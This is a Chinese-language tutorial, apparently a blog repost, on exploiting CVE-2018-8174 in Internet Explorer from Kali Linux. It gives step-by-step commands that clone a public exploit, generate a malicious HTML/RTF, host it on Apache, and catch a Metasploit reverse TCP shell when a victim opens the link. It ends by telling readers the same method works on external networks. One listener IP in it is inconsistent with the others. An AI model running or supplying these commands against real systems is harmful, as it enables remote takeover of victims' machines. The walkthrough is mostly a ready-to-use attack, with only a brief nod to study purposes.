Kali利用0DAY漏洞CVE-2018-8174獲取shell權限

0day一把怎樣的武器
0day漏洞,又稱“零日漏洞”(zero-day),是已經被發現(有可能未被公開),而官方還沒有相關補丁的漏洞。通俗地講就是,除了漏洞發現者,沒有其他的人知道這個漏洞的存在,並且可以有效地加以利用,發起的攻擊往往具有很大的突發性與破壞性。

進入實戰,學習0day更多的是學習一種思維模式
1、安裝CVE-2018-8174_EXP
從github上克隆CVE-2018-8174的EXP到Kali

root@superman:~# git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git

在這裏插入圖片描述
2、生成惡意html文件

root@superman:~# cd CVE-2018-8174_EXP/
root@superman:~/CVE-2018-8174_EXP# ls
CVE-2018-8174.py  README.md
root@superman:~/CVE-2018-8174_EXP#  python CVE-2018-8174.py -u http://192.168.1.13/exploit.html -o hack.rtf -i 192.168.1.13 -p 4444 

參數說明:
-u:URL地址,惡意html文件hack.html的訪問地址
-o:生成文檔
-i:監聽地址
-p:監聽端口
惡意html文件生成成功

在這裏插入圖片描述
在這裏插入圖片描述
3、將惡意html文件移動到網站根目錄

root@superman:~/CVE-2018-8174_EXP# cp exploit.html /var/www/html/ 
root@superman:~/CVE-2018-8174_EXP# service apache2 start

在這裏插入圖片描述
4、新打開一個終端 CTRL+SHIFT+T,生成MSF監聽
使用msfconsole打開(每次的啓動圖案不同)

root@superman:~# msfconsole

在這裏插入圖片描述

msf5 >  use exploit/multi/handler 
msf5 exploit(multi/handler) >  set payload windows/shell/reverse_tcp                                                          
payload => windows/shell/reverse_tcp                                                                                          
msf5 exploit(multi/handler) > show options (查看攻擊載荷需要配置的參數)
msf5 exploit(multi/handler) > set lhost 190.168.1.13(設置接收的ip,即本機ip)

在這裏插入圖片描述
啓動攻擊載荷 exploit
在這裏插入圖片描述
5、受害者點擊惡意鏈接
進入win系統,打開IE瀏覽器或是IE內核的瀏覽器,比如360 瀏覽器,訪問惡意鏈接 http://192.168.1.13/exploit.html(這是我kali機的ip)
在這裏插入圖片描述
6、返回kali查看已經建立會話,執行相關cmd進行操作即可
在這裏插入圖片描述
漏洞的復現是學習滲透方式的一種辦法,文中提到的只是在局域網中進行測試,如果想在外網測試,方法相同,可以自己嘗試,僅供交流學習。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章